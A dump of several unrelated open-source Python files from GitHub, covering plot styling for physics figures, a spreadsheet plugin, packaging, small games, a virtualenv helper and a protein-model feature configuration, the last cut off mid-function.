0.2\n cmsTextSize = 0.75\n cmsTextOffset = 0.1 # only used in outOfFrame version\n \n relPosX = 0.045\n relPosY = 0.035\n relExtraDY = 1.2\n\n # ratio of \"CMS\" and extra text size\n extraOverCmsTextSize = 0.76\n\n outOfFrame = False\n alignY_=3\n alignX_=2\n if iPosX/10==0: \n alignX_=1\n if iPosX==0:\n alignX_=1\n if iPosX/10==1: \n alignX_=1\n if iPosX/10==2: \n alignX_=2\n if iPosX/10==3: \n alignX_=3\n if iPosX == 0: \n relPosX = 0.12\n \n align_ = 10*alignX_ + alignY_\n\n H = pad.GetWh()\n W = pad.GetWw()\n l = pad.GetLeftMargin()\n t = pad.GetTopMargin()\n r = pad.GetRightMargin()\n b = pad.GetBottomMargin()\n\n pad.cd()\n\n latex = ROOT.TLatex()\n latex.SetNDC()\n latex.SetTextAngle(0)\n latex.SetTextColor(ROOT.kBlack) \n\n extraTextSize = extraOverCmsTextSize*cmsTextSize\n\n latex.SetTextFont(42)\n latex.SetTextAlign(31) \n 
latex.SetTextSize(lumiTextSize*t) \n latex.DrawLatex(1-r,1-t+lumiTextOffset*t,lumiText)\n \n if outOfFrame:\n latex.SetTextFont(cmsTextFont)\n latex.SetTextAlign(11) \n latex.SetTextSize(cmsTextSize*t) \n latex.DrawLatex(l,1-t+lumiTextOffset*t,cmsText)\n \n pad.cd()\n\n posX_=0.\n if iPosX%10<=1:\n posX_ = l + relPosX*(1-l-r)\n if iPosX%10==2:\n posX_ = l + 0.5*(1-l-r)\n if iPosX%10==3:\n posX_ = 1-r - relPosX*(1-l-r)\n\n posY_ = 1-t - relPosY*(1-t-b)\n\n if not outOfFrame:\n latex.SetTextFont(cmsTextFont)\n latex.SetTextSize(cmsTextSize*t)\n latex.SetTextAlign(align_)\n latex.DrawLatex(posX_, posY_, cmsText)\n if writeExtraText:\n latex.SetTextFont(extraTextFont)\n latex.SetTextAlign(align_)\n latex.SetTextSize(extraTextSize*t)\n latex.DrawLatex(posX_, posY_- relExtraDY*cmsTextSize*t + 0.01, extraText)\n elif writeExtraText:\n if iPosX==0: \n posX_ = l + relPosX*(1-l-r)\n posY_ = 1-t+lumiTextOffset*t\n latex.SetTextFont(extraTextFont)\n latex.SetTextSize(extraTextSize*t)\n latex.SetTextAlign(align_)\n latex.DrawLatex(posX_, posY_+0.7, extraText) \n","repo_name":"cms-tau-pog/TauFW","sub_path":"Fitter/python/HighPT/stylesHighPT.py","file_name":"stylesHighPT.py","file_ext":"py","file_size_in_byte":9454,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"10672392389","text":"from dougsheets import plugin\n\n\nclass LessThan(plugin.Plugin):\n def removeLessThan(self, col, number):\n newSheetObject = []\n sheetObject = self.gui.sheetObject\n\n for row in sheetObject:\n if type(row[col]) == str:\n newSheetObject.append(row)\n else:\n if int(row[col]) >= number:\n newSheetObject.append(row)\n\n self.gui.sheetObject = newSheetObject\n self.gui.update_sheet()\n\n def LessThanAction(self, e):\n number = self.getInput__Variable('num', \"Less-Than Filter\", \"Under what number should we filter out?\", e)\n column = self.getInput__Column('col', \"Less-Than Filter\", \"What column should we filter from?\", e)\n\n if number and column:\n number = int(number)\n self.removeLessThan(column, number)\n\n def init(self):\n self.createMenuItem(\n self.gui.menu_filter,\n \"Less Than\",\n self.LessThanAction,\n cli_help=\"Usage: 'less_than col=[COLUMN LETTER/NUMBER] num=[NUMBER]'\"\n )\n\nsettings = {\n \"class\": LessThan,\n 'name': \"Less-Than Filter\",\n}\n\n","repo_name":"DougBeney/DevSheets-Plugins","sub_path":"less_than_filter.py","file_name":"less_than_filter.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33587714305","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport codecs\nimport os\n\nfrom setuptools import setup, find_packages\n\n\nPACKAGE = \"xvistaprof\"\nNAME = \"xvistaprof\"\nDESCRIPTION = \"Astropy reader for XVISTA profile tables\"\nAUTHOR = \"Jonathan Sick\"\nAUTHOR_EMAIL = \"jonathansick@mac.com\"\nURL = \"https://github.com/jonathansick/xvistaprof/\"\nVERSION = __import__(PACKAGE).__version__\n\n\ndef read(fname):\n return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=read(\"README.rst\"),\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=\"BSD\",\n url=URL,\n packages=find_packages(exclude=[\"tests.*\", \"tests\"]),\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD 
License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n ],\n zip_safe=False,\n)\n","repo_name":"jonathansick/xvistaprof","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28912206563","text":"from typing import Optional\nfrom list_node import ListNode\n\n\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n prev = None\n cur = head\n\n while cur is not None:\n next_node = cur.next\n cur.next = prev\n prev = cur\n cur = next_node\n\n return prev\n\n","repo_name":"ysakiyev/31github","sub_path":"neetcode_150/linked_lists/206_reverse_linked_list.py","file_name":"206_reverse_linked_list.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37577320646","text":"from pathlib import Path\nimport sys, os, venv, argparse, subprocess\n\nNO_VIRTUAL_ENV = os.getenv(\"NO_VIRTUAL_ENV\")\n\nclass Env():\n def __init__(self, python):\n self._python = python\n\n @classmethod\n def get(cls):\n return cls(sys.executable)\n\n @staticmethod\n def run(*args, **kwargs):\n print(\" \".join(args))\n completed_process = subprocess.run(args, **kwargs)\n completed_process.check_returncode()\n return completed_process\n\n def python(self, *args, **kwargs):\n return self.run(self._python, *args, **kwargs)\n\n def pip(self, *args, **kwargs):\n return self.python(\"-m\", \"pip\", \"--isolated\", \"--disable-pip-version-check\", *args, **kwargs)\n\n def setup_py(self, *args, **kwargs):\n return self.python(\"setup.py\", *args, **kwargs)\n\n\nclass VirtualEnv(Env):\n @classmethod\n def get(cls):\n return cls(sys.executable) if cls.is_venv_active() else None\n\n @classmethod\n def make(cls, venv_dir=\"venv\"):\n if cls.is_venv_active():\n print(\"Virtual Environment already active at:\")\n print(sys.prefix, end=\"\\n\\n\")\n env = VirtualEnv(sys.executable)\n else:\n venv_path = Path(venv_dir).resolve()\n # For Python <3.10, resolve won't return an absolute path if the\n # file/directory does not exist on Windows\n # https://bugs.python.org/issue38671\n if not venv_path.is_absolute():\n venv_path = Path().resolve() / venv_path\n print(\"Creating new Virtual Environment at:\")\n print(venv_path, end=\"\\n\\n\")\n # https://github.com/python/cpython/blob/38f331d4656394ae0f425568e26790ace778e076/Lib/venv/__init__.py#L476-L479\n if os.name == 'nt':\n use_symlinks = False\n else:\n use_symlinks = True\n builder = venv.EnvBuilder(system_site_packages=False,\n clear=False,\n symlinks=use_symlinks,\n upgrade=False,\n with_pip=True,\n prompt=None,\n upgrade_deps=False\n )\n context = builder.ensure_directories(venv_path)\n builder.create(venv_path)\n env = VirtualEnv(context.env_exec_cmd)\n\n return env\n\n @classmethod\n def is_venv_active(self):\n return sys.prefix != sys.base_prefix\n\ndef use_virtual_env():\n return not NO_VIRTUAL_ENV\n\nclass DecoratedArgParse():\n def __init__(self, *args, **kwargs):\n self.arg_parser = argparse.ArgumentParser(*args, **kwargs)\n self.arg_parser.error = self.error #Provide our own error function\n self._subparsers = None\n\n @property\n def subparsers(self):\n if self._subparsers is None:\n self._subparsers = self.arg_parser.add_subparsers(\n title=\"Available Commands\",\n required=True,\n metavar=\"\"\n )\n return self._subparsers\n\n def make_subparsers(self, *args, 
**kwargs):\n self._subparsers = self.arg_parser.add_subparsers(*args, **kwargs)\n\n def parse_args(self, args=None):\n return self.arg_parser.parse_args(args)\n\n def parser(self, *args, **kwargs):\n def decorator(f):\n parser_args, parser_kwargs = self.check_params((args, kwargs))\n parser = self.subparsers.add_parser(f.__name__.lower().replace(\"_\", \"-\"), *parser_args, **parser_kwargs)\n if hasattr(f, \"__argparse_params__\"):\n for params in f.__argparse_params__:\n parser_args, parser_kwargs = params\n parser.add_argument(*parser_args, **parser_kwargs)\n del f.__argparse_params__\n parser.set_defaults(func=f)\n return f\n return decorator\n\n def argument(self, *args, **kwargs):\n def decorator(f):\n params = (args, kwargs)\n if not hasattr(f, \"__argparse_params__\"):\n f.__argparse_params__ = []\n f.__argparse_params__.append(params)\n return f\n return decorator\n\n @staticmethod\n def check_params(params):\n args, kwargs = params\n help_desc = kwargs.pop(\"help_desc\", None)\n if help_desc is not None:\n kwargs[\"help\"] = help_desc\n kwargs[\"description\"] = help_desc\n return (args, kwargs)\n\n def error(self, message):\n \"\"\"error(message: string)\n Prints a usage message incorporating the message to stderr,\n followed by the help message, and then exits.\n If you override this in a subclass, it should not return -- it\n should either exit or raise an exception.\n \"\"\"\n sys.stderr.write(f\"error: {message}\\n\")\n self.arg_parser.print_help(sys.stderr)\n sys.exit(2)\n\ndef monopoly_probabilities_dir():\n return Path(__file__).parents[2].resolve()\n","repo_name":"dunkmann00/Monopoly-Probabilities","sub_path":"scripts/scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33731387122","text":"BLACK = '\\033[30m'\nOKBLUE = '\\033[94m'\nOKGREEN = '\\033[92m'\nRED = '\\033[31m'\nBLUE = '\\033[34m'\nFAIL = '\\033[91m'\nENDC = '\\033[0m'\nBOLD = '\\033[1m'\nITALIC = '\\033[3m'\nSTRIKE = '\\033[29m'\nUNDERLINE = '\\033[4m'\n\n# --------------------------\n_VERSION = \"DEV_1.7\"\n_AUTHOR = \"Mondei1\"\n# --------------------------\n\n# scan.py will set this value to TRUE when it start's the scan\ninScan = False\n\n# If phase 1 is skipped with CTRL+C\nskipped = False\n\n# These files cannot be scan because the program hasn't permissions to access the file :c\nskipped_files = []\n\n# How many files are founded\nall_files = 0\n# How many files already scanned\nfiles_scanned = 0\n# Founded files\nfounded = []\n# --------------------------\n# Founded dir's\ndirs = []\n# How many dir's already scanned\ndirs_scanned = 0\n# How many dir's exists\ndirs_total = 0\n# --------------------------\n# Founded text lines (/path/to/file.txt (in line 34), ...)\ntexts = []\n# How many words are readed\nwords_readed = 0\n# How many words exists\nwords_total = 0\n# --------------------------\n# This blacklist is for files, where the program can't calculate the MD5 hash!\nblacklist = [ \"steam.pipe\" ]\n# --------------------------\n# The program will ignore these files/folders\nignore_Files = []\nignore_Folders = []","repo_name":"Mondei1/FileFinder","sub_path":"lib/var.py","file_name":"var.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1822058534","text":"class Point():\n def __init__(self, x_val, y_val):\n self.x_coord = x_val\n self.y_coord = y_val\n \n 
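# move the point in place by the given x and y offsets\n    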
def move(self, dx, dy):\n self.x_coord += dx\n self.y_coord += dy\n \n def __str__(self):\n return \"( \" + str(self.x_coord) + \", \" + str(self.y_coord) + \" )\"\n \n def multi(self, mn):\n self.x_coord *= mn\n self.y_coord *= mn\n \n# p1 = Point(0,0)\n# print(p1)\n# p1.move(1,1)\n# print(p1)\n# p1.multi(3)\n# print(p1)\n\nclass Des():\n def __init__(self, question, answer):\n self.question = question\n self.answer_list = answer\n self.connections = []\n self.connection = None\n \n def make_choice(self):\n print (self.question)\n choice = input(str(self.answer_list))\n while choice not in self.answer_list:\n print(\"Invalid Answer\")\n choice = input(str(self.answer_list))\n if choice == self.answer_list[0]:\n self.connection = self.connections[0]\n if choice == self.answer_list[1]:\n self.connection = self.connections[1]\n \n return self.connection\n\n def connectAndPick(self, con1, con2):\n self.connections.append(con1)\n self.connections.append(con2)\n \n\nstart = Des(\"Left or right?\", [\"left\", \"right\"])\nleft = Des(\"You find a mason. Claim the manson?\", [\"yes\", \"no\"])\nright = Des(\"You find a fire place. Go inside the fire?\", [\"go in\", \"stay out\"])\nfireplace = Des(\"You see a fairy, follow her?\", [\"follow\", \"don't follow\"])\nfollow = Des(\"You find a fairy viilage. Do you party with them?\", ['party', 'don\\'t party'])\nclaim = Des(\"You claim the manson. Do the paperwork?\", ['yes','no'])\ninside = Des(\"You don\\'t claim the mason. Go inside the manson?\", ['yes','no'])\nsteal = Des(\"You steal some stuff. Run away or stay and get more stuff?\", [\"run\", \"stay\"])\nstay = Des(\"Stay inside and wait. The owner returns, talk to them or no?\", ['talk', 'run'])\nvillage = Des(\"You find a village. Stay or no?\", [\"stay\", \"leave\"])\n\nstart.connectAndPick(left, right)\nleft.connectAndPick(claim, inside) \nright.connectAndPick(fireplace, \"You freez to death due to the cold.\")\nfireplace.connectAndPick(follow, \"Get killed by angry fairies.\")\nfollow.connectAndPick(village, \"You get killed out into the cold and die.\")\ninside.connectAndPick(steal, stay)\nclaim.connectAndPick(\"You do the paperwork and get a free mason.\", \"You don/'t do the paperwork and get sued and jailed by the real owner.\")\nsteal.connectAndPick(\"You get away with /$5000.\", \"You get caught and fined and go into debt.\")\nstay.connectAndPick(\"You two become friends and you become rich.\", \"You get jailed as a trespasser.\")\nvillage.connectAndPick(\"You live forever with the fairies\", \"You leave in two pieces(aka dead~).\")\n\ncurrent = start\nwhile type(current) is not str:\n current = current.make_choice()\nprint(current)\n \n ","repo_name":"chinguyen7/text-adventer","sub_path":"TextBasedAdvente.py","file_name":"TextBasedAdvente.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42025442774","text":"#!/bin/python3 -tt\n\n# Author: Fº Javier Gutierrez-Maturana Sanchez\n# \n# Description: This program play bingo, \n# each player has only one cartoon.\n\nimport random\nfrom Carton import Carton\n\nMAX_NUMBERS = 5\nMAX_VALUE = 90\nMAX_LINES = 3\nNUMBERS_LIST = tuple(range(1, MAX_VALUE + 1))\n\ndef main():\n cartoons = []\n\n cartoons.append(Carton(MAX_LINES, MAX_NUMBERS, MAX_VALUE))\n cartoons.append(Carton(MAX_LINES, MAX_NUMBERS, MAX_VALUE))\n cartoons.append(Carton(MAX_LINES, MAX_NUMBERS, MAX_VALUE))\n cartoons.append(Carton(MAX_LINES, MAX_NUMBERS, MAX_VALUE))\n\n # 
print(\"Bingo numbers!\\n{}\".format(NUMBERS_LIST))\n\n # print(\"---- Show perfects Cartoons ----\")\n # for i in range(len(cartoons)):\n # print (\"Carton {}\".format(i))\n # cartoons[i].debug_cartoon(0)\n # print(\"--------------------------------\")\n\n bingo = False\n winner = -1\n while not bingo:\n number = random.randint(1, MAX_VALUE)\n # print (\"Number! {}\".format(number))\n for player in range(len(cartoons)):\n cartoons[player].markNumber(number)\n\n if cartoons[player].hasLine():\n print(\"Player {} Line!\".format(player))\n\n if cartoons[player].hasBingo():\n winner = player\n bingo = True\n break # Only one winner\n\n if winner >= 0:\n print(\"Game finish Bingo! Player {}\".format(winner))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jgmatu/Bingo","sub_path":"Bingo.py","file_name":"Bingo.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45677806235","text":"\"\"\"Configuration for Input Feature Generation\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nfrom enum import Enum\r\nfrom typing import NamedTuple, List, Tuple, Union, Optional\r\nimport numpy as np \r\nfrom protein_learning.common.protein_constants import AA_ALPHABET\r\nfrom protein_learning.features.constants import SMALL_SEP_BINS, DEFAULT_PW_DIST_RADII\r\n\r\n\r\nclass FeatureDescriptor(NamedTuple):\r\n \"\"\"Descriptor for a given feature\"\"\"\r\n name: FeatureName\r\n ty: FeatureTy\r\n encode_dim: int\r\n embed_dim: int\r\n embed_tys: List[FeatureEmbeddingTy]\r\n # Optional - for embeddings\r\n mult: Optional[int] = 1\r\n rbf_sigma: Optional[float] = 4\r\n rbf_radii: Optional[List[float]] = None\r\n n_fourier_feats: Optional[int] = None\r\n\r\n\r\nclass InputFeatureConfig(NamedTuple):\r\n \"\"\"Config Input Features\"\"\"\r\n # Global settings\r\n # pad embeddings with an extra bin (n_classes+1) - can be used\r\n # in conjunction with sequence or coordinate masking, e.g.\r\n pad_embeddings: bool = False\r\n # add noise to one hot encodings?\r\n one_hot_noise_sigma: float = 0 # set>0 to have this amount of random noise added\r\n\r\n # Residue Type (SCALAR)\r\n embed_res_ty: bool = False\r\n one_hot_res_ty: bool = False\r\n res_ty_embed_dim: int = 32\r\n res_ty_corrupt_prob: float = 0\r\n\r\n # Residue Relative Position (SCALAR)\r\n embed_res_rel_pos: bool = False\r\n one_hot_res_rel_pos: bool = False\r\n res_rel_pos_embed_dim: int = 6\r\n res_rel_pos_encode_dim: int = 10\r\n\r\n # BB Dihedral (SCALAR)\r\n embed_bb_dihedral: bool = False\r\n one_hot_bb_dihedral: bool = False\r\n fourier_encode_bb_dihedral: bool = False\r\n bb_dihedral_embed_dim: int = 6\r\n bb_dihedral_encode_dim: int = 36\r\n n_bb_dihedral_fourier_feats: int = 2\r\n\r\n # SC Dihedral (SCALAR)\r\n include_sc_dihedral: bool = False\r\n sc_dihedral_noise: List[float] = [0,0]\r\n\r\n # Centrality (SCALAR)\r\n embed_centrality: bool = False\r\n one_hot_centrality: bool = False\r\n rbf_encode_centrality: bool = False\r\n centrality_encode_dim: int = 6\r\n centrality_embed_dim: int = 6\r\n centrality_rbf_radii: List[float] = [6, 12, 18, 24, 30, 36]\r\n\r\n # Secondary Structure\r\n embed_sec_struct: bool = False\r\n sec_struct_embed_dim: int = 16\r\n\r\n # Relative Separation (PAIR)\r\n embed_rel_sep: bool = False\r\n one_hot_rel_sep: bool = False\r\n rel_sep_embed_dim: int = 32\r\n rel_sep_encode_bins: List[int] = SMALL_SEP_BINS\r\n\r\n # Relative Distance (PAIR)\r\n embed_rel_dist: bool = False\r\n one_hot_rel_dist: bool = 
False\r\n rbf_encode_rel_distance: bool = False\r\n rel_dist_embed_dim: int = 16\r\n rel_dist_encode_dim: int = 32\r\n rel_dist_bounds: Tuple[float, float] = (2.5, 16.5)\r\n rel_dist_rbf_radii: List[float] = DEFAULT_PW_DIST_RADII\r\n rel_dist_atom_tys: List[str] = [\"CA\", \"CA\", \"N\", \"CA\"]\r\n\r\n # trRosetta Orientation (PAIR)\r\n embed_tr_rosetta_ori: bool = False\r\n one_hot_tr_rosetta_ori: bool = False\r\n fourier_encode_tr_rosetta_ori: bool = False\r\n tr_rosetta_ori_embed_dim: int = 6\r\n tr_rosetta_ori_encode_dim: int = 36\r\n tr_rosetta_fourier_feats: int = 2\r\n\r\n # Joint Embedding for Pair and Sep (PAIR)\r\n joint_embed_res_pair_rel_sep: bool = False\r\n joint_embed_res_pair_rel_sep_embed_dim: int = 48\r\n\r\n # Invariant relative orientation features\r\n quat_encode_rel_ori: bool = False\r\n encode_local_rel_coords: bool = False\r\n\r\n # relative chain embedding\r\n one_hot_rel_chain: bool = False\r\n\r\n # Extra\r\n extra_residue_dim: int = 0\r\n extra_pair_dim: int = 0\r\n coord_noise: float = 0\r\n\r\n @property\r\n def include_res_ty(self):\r\n \"\"\"Whether to include residue type features\"\"\"\r\n return self.joint_embed_res_pair_rel_sep \\\r\n or self.embed_res_ty \\\r\n or self.one_hot_res_ty # noqa\r\n\r\n @property\r\n def include_rel_pos(self):\r\n \"\"\"Whether to include residue position features\"\"\"\r\n return self.embed_res_rel_pos or self.one_hot_res_rel_pos\r\n\r\n @property\r\n def include_bb_dihedral(self):\r\n \"\"\"Whether to include bb dihedral features\"\"\"\r\n return self.embed_bb_dihedral or self.one_hot_bb_dihedral or \\\r\n self.fourier_encode_bb_dihedral # noqa\r\n\r\n @property\r\n def include_centrality(self):\r\n \"\"\"Whether to include centrality features\"\"\"\r\n return self.embed_centrality or self.one_hot_centrality or self.rbf_encode_centrality\r\n\r\n @property\r\n def include_rel_sep(self):\r\n \"\"\"Whether to include relative separation features\"\"\"\r\n return self.one_hot_rel_sep or self.embed_rel_sep \\\r\n or self.joint_embed_res_pair_rel_sep # noqa\r\n\r\n @property\r\n def include_rel_dist(self):\r\n \"\"\"Whether to include relative distance features\"\"\"\r\n return self.one_hot_rel_dist or self.embed_rel_dist or self.rbf_encode_rel_distance\r\n\r\n @property\r\n def rel_dist_atom_pairs(self) -> List[Tuple[str, str]]:\r\n \"\"\"atom pairs to use for relative distance\"\"\"\r\n tys = self.rel_dist_atom_tys\r\n return list(zip(tys[::2], tys[1::2]))\r\n\r\n @property\r\n def include_tr_ori(self):\r\n \"\"\"Whether to include TrRosetta orientation features\r\n\r\n Note: CB atom must be present to sue these features - can add\r\n \"impute_cb\" flag to data loader if this atom is not available.\r\n \"\"\"\r\n return self.embed_tr_rosetta_ori or self.fourier_encode_tr_rosetta_ori \\\r\n or self.one_hot_tr_rosetta_ori # noqa\r\n\r\n @property\r\n def include_rel_ori(self):\r\n \"\"\"Whether to include relative orientation information\r\n e.g. 
quaternion of (pairwise) relative orientation matrices.\r\n \"\"\"\r\n return self.quat_encode_rel_ori\r\n\r\n @property\r\n def has_extra(self):\r\n \"\"\"Whether the input features include flags\"\"\"\r\n return self.extra_residue_dim > 0 or self.extra_pair_dim > 0\r\n\r\n @property\r\n def descriptors(self) -> List[FeatureDescriptor]:\r\n \"\"\"Get a list of FeatureDescriptors\r\n For all features specified by the config\r\n \"\"\"\r\n descriptors = []\r\n\r\n if self.embed_sec_struct:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.SS,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=3,\r\n embed_dim=self.sec_struct_embed_dim,\r\n embed_tys=[FeatureEmbeddingTy.EMBED]\r\n )\r\n )\r\n\r\n if self.include_res_ty:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.RES_TY,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=len(AA_ALPHABET),\r\n embed_dim=self.res_ty_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_res_ty,\r\n one_hot=self.one_hot_res_ty\r\n )\r\n\r\n )\r\n\r\n )\r\n\r\n if self.include_rel_pos:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_POS,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=self.res_rel_pos_encode_dim,\r\n embed_dim=self.res_rel_pos_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_res_rel_pos,\r\n one_hot=self.one_hot_res_rel_pos\r\n )\r\n )\r\n\r\n )\r\n\r\n if self.include_bb_dihedral:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.BB_DIHEDRAL,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=self.bb_dihedral_encode_dim,\r\n embed_dim=self.bb_dihedral_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_bb_dihedral,\r\n one_hot=self.one_hot_bb_dihedral,\r\n fourier=self.fourier_encode_bb_dihedral,\r\n ),\r\n mult=3,\r\n n_fourier_feats=self.n_bb_dihedral_fourier_feats\r\n ),\r\n )\r\n\r\n if self.include_centrality:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.CENTRALITY,\r\n ty=FeatureTy.RESIDUE,\r\n encode_dim=self.centrality_encode_dim,\r\n embed_dim=self.centrality_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_centrality,\r\n one_hot=self.one_hot_centrality,\r\n rbf=self.rbf_encode_centrality,\r\n ),\r\n rbf_radii=self.centrality_rbf_radii,\r\n ),\r\n )\r\n\r\n if self.include_rel_sep:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_SEP,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=len(self.rel_sep_encode_bins),\r\n embed_dim=self.rel_sep_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_rel_sep,\r\n one_hot=self.one_hot_rel_sep,\r\n ),\r\n ),\r\n )\r\n\r\n if self.include_rel_dist:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.REL_DIST,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=self.rel_dist_encode_dim,\r\n embed_dim=self.rel_dist_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_rel_dist,\r\n one_hot=self.one_hot_rel_dist,\r\n rbf=self.rbf_encode_rel_distance,\r\n ),\r\n mult=len(self.rel_dist_atom_tys) // 2,\r\n rbf_sigma=np.mean([(x-y) for x,y in zip(self.rel_dist_rbf_radii[1:],self.rel_dist_rbf_radii[:-1])]),\r\n rbf_radii=self.rel_dist_rbf_radii,\r\n ),\r\n )\r\n\r\n if self.include_tr_ori:\r\n descriptors.append(\r\n FeatureDescriptor(\r\n name=FeatureName.TR_ORI,\r\n ty=FeatureTy.PAIR,\r\n encode_dim=self.tr_rosetta_ori_encode_dim,\r\n embed_dim=self.tr_rosetta_ori_embed_dim,\r\n embed_tys=_get_encoding_tys(\r\n embed=self.embed_tr_rosetta_ori,\r\n one_hot=self.one_hot_tr_rosetta_ori,\r\n fourier=self.fourier_encode_tr_rosetta_ori,\r\n ),\r\n 
mult=3,\r\n                    n_fourier_feats=self.tr_rosetta_fourier_feats,\r\n                ),\r\n            )\r\n\r\n        if self.quat_encode_rel_ori:\r\n            descriptors.append(\r\n                FeatureDescriptor(\r\n                    name=FeatureName.REL_ORI,\r\n                    ty=FeatureTy.PAIR,\r\n                    encode_dim=4,\r\n                    embed_dim=4,\r\n                    embed_tys=[FeatureEmbeddingTy.NONE]\r\n                ),\r\n            )\r\n\r\n        if self.encode_local_rel_coords:\r\n            descriptors.append(\r\n                FeatureDescriptor(\r\n                    name=FeatureName.REL_COORD,\r\n                    ty=FeatureTy.PAIR,\r\n                    encode_dim=3,\r\n                    embed_dim=3,\r\n                    embed_tys=[FeatureEmbeddingTy.NONE]\r\n                ),\r\n            )\r\n\r\n        if self.one_hot_rel_chain:\r\n            descriptors.append(\r\n                FeatureDescriptor(\r\n                    name=FeatureName.REL_CHAIN,\r\n                    ty=FeatureTy.PAIR,\r\n                    encode_dim=5,\r\n                    embed_dim=5,\r\n                    embed_tys=[FeatureEmbeddingTy.ONEHOT]\r\n                ),\r\n            )\r\n\r\n        if self.extra_pair_dim > 0:\r\n            descriptors.append(\r\n                FeatureDescriptor(\r\n                    name=FeatureName.EXTRA_PAIR,\r\n                    ty=FeatureTy.PAIR,\r\n                    encode_dim=self.extra_pair_dim,\r\n                    embed_dim=self.extra_pair_dim,\r\n                    embed_tys=[FeatureEmbeddingTy.NONE]\r\n                ),\r\n            )\r\n\r\n        if self.extra_residue_dim > 0:\r\n            descriptors.append(\r\n                FeatureDescriptor(\r\n                    name=FeatureName.EXTRA_RES,\r\n                    ty=FeatureTy.RESIDUE,\r\n                    encode_dim=self.extra_residue_dim,\r\n                    embed_dim=self.extra_residue_dim,\r\n                    embed_tys=[FeatureEmbeddingTy.NONE]\r\n                ),\r\n            )\r\n\r\n        if self.include_sc_dihedral:\r\n            descriptors.append(\r\n                FeatureDescriptor(\r\n                    name=FeatureName.SC_DIHEDRAL,\r\n                    ty=FeatureTy.RESIDUE,\r\n                    embed_tys=[FeatureEmbeddingTy.NONE],\r\n                    encode_dim=21,\r\n                    embed_dim=21,\r\n                ),\r\n            )\r\n\r\n        return descriptors\r\n\r\n    def include_feat(self, name: Union[str, FeatureName]) -> bool:\r\n        \"\"\"Whether the config specifies the given feature\"\"\"\r\n        name = name if isinstance(name, str) else name.value\r\n        if name == FeatureName.REL_POS.value:\r\n            return self.include_rel_pos\r\n        if name == FeatureName.REL_SEP.value:\r\n            return self.include_rel_sep\r\n        if name == FeatureName.REL_DIST.value:\r\n            return self.include_rel_dist\r\n        if name == FeatureName.BB_DIHEDRAL.value:\r\n            return self.include_bb_dihedral\r\n        if name == FeatureName.CENTRALITY.value:\r\n            return self.include_centrality\r\n        if name == FeatureName.RES_TY.value:\r\n            return self.include_res_ty\r\n        if name == FeatureName.TR_ORI.value:\r\n            return self.include_tr_ori\r\n        if name == FeatureName.REL_ORI.value:\r\n            return self.include_rel_ori\r\n        if name == FeatureName.REL_COORD.value:\r\n            return self.encode_local_rel_coords\r\n        if name == FeatureName.REL_CHAIN.value:\r\n            return self.one_hot_rel_chain\r\n        if name == FeatureName.EXTRA_RES.value:\r\n            return self.extra_residue_dim > 0\r\n        if name == FeatureName.EXTRA_PAIR.value:\r\n            return self.extra_pair_dim > 0\r\n        if name == FeatureName.SC_DIHEDRAL.value:\r\n            return self.include_sc_dihedral\r\n        return False\r\n\r\n\r\nclass FeatureTy(Enum):\r\n    \"\"\"Feature Type flag\r\n    \"\"\"\r\n    RESIDUE, COORD, PAIR = 1, 2, 3\r\n\r\n\r\nclass FeatureEmbeddingTy(Enum):\r\n    \"\"\"Feature embedding type flag\r\n    \"\"\"\r\n    RBF, ONEHOT, EMBED, FOURIER, NONE = 0, 1, 2, 3, 4\r\n\r\n\r\ndef _get_encoding_tys(one_hot=False, embed=False, rbf=False, fourier=False) -> List[FeatureEmbeddingTy]:\r\n    \"\"\"Encoding type for feature\"\"\"\r\n    